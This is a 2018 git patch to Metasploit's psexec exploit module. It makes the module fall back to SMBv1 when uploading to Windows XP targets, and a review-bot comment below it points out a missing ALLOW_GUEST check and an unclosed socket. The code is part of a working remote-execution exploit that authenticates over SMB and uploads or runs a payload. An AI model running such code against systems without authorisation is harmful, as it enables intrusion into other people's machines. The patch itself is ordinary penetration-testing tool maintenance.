From 7f3dfccbfe66c4ef13e283cf4cb3562193121497 Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Mon, 2 Jul 2018 17:34:53 -0500
Subject: [PATCH] Land #10242, avoid using SMBv2 on Windows XP Native Upload targets

---
 modules/exploits/windows/smb/psexec.rb | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index c271ee45e2..23620231d6 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -86,12 +86,22 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
   end
+  def native_upload_with_workaround
+    # Avoid implementing NTLMSSP on Windows XP
+    # http://seclists.org/metasploit/2009/q1/6
+    if smb_peer_os == "Windows 5.1"
+      connect(versions: [1])
+      smb_login
+    end
+    native_upload(datastore['SHARE'])
+  end
+
   def exploit
     print_status("Connecting to the server...")
-    connect(versions: [1,2])
+    connect(versions: [2,1])
     print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
-    smb_login()
+    smb_login
     if not simple.client.auth_user and not datastore['ALLOW_GUEST']
       print_line(" ")
@@ -117,12 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
         execute_powershell_payload
       else
         print_status('Selecting native target')
-        native_upload(datastore['SHARE'])
+        native_upload_with_workaround
       end
     when 'PowerShell'
       execute_powershell_payload
     when 'Native upload'
-        native_upload(datastore['SHARE'])
+        native_upload_with_workaround
     when 'MOF upload'
       mof_upload(datastore['SHARE'])
     end
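Review bot: The SMB1 fallback in native_upload_with_workaround authenticates a second time with `smb_login` but never repeats the guest-session check that `exploit` applies to the first session (`if not simple.client.auth_user and not datastore['ALLOW_GUEST']`), so the ALLOW_GUEST gate only ever covers the SMB2 connection. If the SMB1 re-login can complete as guest, the upload proceeds unchecked; moving that auth_user/ALLOW_GUEST test into a small helper that both `exploit` and the workaround call after their respective `smb_login` would close the gap. The re-negotiation also appears to leave the first session's socket open, since nothing tears it down before `connect(versions: [1])` — unless `connect` disconnects internally, a `disconnect` on the line before it is warranted. The comment `# Avoid implementing NTLMSSP on Windows XP` does not say what actually fails; if the intent is the one in the commit title, something like `# Windows XP (NativeOS "Windows 5.1") cannot speak SMB2; re-negotiate SMB1 only before uploading (see thread below)` would tell the next maintainer why the version list is overridden. The body of `exploit` continues past the end of this hunk, and the second hunk only swaps the two call sites to the new wrapper.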